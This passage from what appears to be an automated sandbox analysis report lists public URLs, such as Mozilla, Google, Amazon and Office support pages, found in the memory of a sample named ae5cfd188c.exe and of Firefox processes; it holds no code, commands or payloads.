                          Source: ae5cfd188c.exe, 00000007.00000003.2520361481.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2520653498.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655845392.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655035263.0000000005465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005620000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: ae5cfd188c.exe, 00000007.00000003.2520361481.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497811681.000000000564C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2520653498.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005645000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655845392.0000000005465000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631088178.000000000546C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2655035263.0000000005465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: ae5cfd188c.exe, 00000007.00000003.2497934385.0000000005620000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631261345.0000000005440000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://topsites.services.mozilla.com/cid/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/N&3
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozill
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/parent/ext-browserSet
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2736817789.000002BA61F15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2726304100.000002BA61D3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2722032655.000002BA61B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: firefox.exe, 00000018.00000002.2818447104.000002BA59DD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4AA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA63403000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
                          Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hulu.com/watch/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                          Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                          Source: firefox.exe, 00000018.00000002.2881483129.000002BA634F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA637D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63756000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797999061.000002BA55DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2781567528.000000D7800BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A429000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
